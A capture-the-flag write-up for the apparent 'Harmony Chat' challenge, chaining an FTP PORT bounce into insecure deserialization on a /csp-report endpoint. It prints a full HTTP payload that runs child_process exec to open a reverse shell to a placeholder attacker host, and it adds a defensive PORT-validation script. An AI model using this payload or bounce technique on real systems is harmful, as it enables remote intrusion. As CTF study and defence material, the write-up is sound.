Tags: ftp ssrf deserialization
Rating: 3.0
* RCE is achievable via insecure deserialization on the /csp-report endpoint of the application's HTTP server.
* Make a chatlog that looks exactly like a POST request to that endpoint, with a reverse-shell payload in it (I made 5 users with names like ``POST /csp-report?``, ``Host``, etc.). Download the chatlog via FTP, which puts the file on the server.
* Connect to their FTP server externally. Use FTP in active mode (PORT command) so the FTP server sends the chatlog to the application's HTTP server.
* Catch the reverse shell. Profit.
Payload:
```
POST /csp-report?: HTTP/1.1
Host: localhost:3380
Content-Length: 386
Content-Type: application/csp-report
{"csp-report": {"blocked-uri": "x", "document-uri": "X", "effective-directive": "X", "original-policy": "X", "referrer": "X", "status-code": "X", "violated-directive": "X", "source-file": {"toString": {"___js-to-json-class___": "Function", "json": "process.mainModule.require(\"child_process\").exec(\"REDACTED <YOURSERVERHERE> REDACTED \", {stdio:\"inherit\"})"}}}}
```
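The FTP step above works only because the FTP server honours a PORT command naming a host other than the client itself. The check below is an added example (not code from the challenge or the writeup): it parses the RFC 959 PORT argument and applies the policy hardened FTP daemons use, requiring the data target to be the control-connection peer on an unprivileged port. The addresses and the port 3380 are constructed from the payload's ``Host`` header.

```python
import ipaddress

# Constructed example; not code from the Harmony Chat challenge or the writeup.
# Policy: the data connection target must be the client that opened the control
# connection, and the data port must be unprivileged.
PRIVILEGED_PORT_MAX = 1023


def parse_port_argument(arg: str) -> tuple[ipaddress.IPv4Address, int]:
    """Parse the RFC 959 PORT argument 'h1,h2,h3,h4,p1,p2' into (host, port)."""
    parts = arg.strip().split(",")
    if len(parts) != 6:
        raise ValueError("expected six comma-separated numbers")
    nums = [int(p) for p in parts]          # ValueError on non-numeric input
    if any(n < 0 or n > 255 for n in nums):
        raise ValueError("value outside 0..255")
    host = ipaddress.IPv4Address(".".join(str(n) for n in nums[:4]))
    port = (nums[4] << 8) | nums[5]
    return host, port


def port_command_allowed(arg: str, control_peer: str) -> tuple[bool, str]:
    """Return (allowed, reason) for a PORT command received on a control
    connection whose remote address is control_peer (assumed IPv4 here)."""
    try:
        host, port = parse_port_argument(arg)
    except ValueError as exc:
        return False, f"malformed PORT argument: {exc}"
    peer = ipaddress.ip_address(control_peer)
    if host != peer:
        # The bounce case from the writeup: PORT naming an internal host.
        return False, f"data target {host} differs from control peer {peer}"
    if host.is_loopback or host.is_unspecified or host.is_multicast:
        return False, f"loopback or non-unicast data target {host}"
    if port <= PRIVILEGED_PORT_MAX:
        return False, f"privileged data port {port}"
    return True, f"ok: {host}:{port}"


if __name__ == "__main__":
    # Constructed inputs: a client at 203.0.113.5 asks for a data connection to
    # the internal HTTP server on 127.0.0.1:3380 (3380 = 13*256 + 52), then a
    # legitimate PORT back to itself, a privileged port, and a malformed one.
    for cmd in ("127,0,0,1,13,52", "203,0,113,5,195,80", "203,0,113,5,0,80", "1,2,3"):
        print(cmd, "->", port_command_allowed(cmd, "203.0.113.5"))
```

Logging the rejected PORT target alongside the control peer gives a direct detection signal for this class of bounce attempt.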
Comprehensive writeup [here](https://ubcctf.github.io/2020/11/dragonctf2020-harmony_chat/)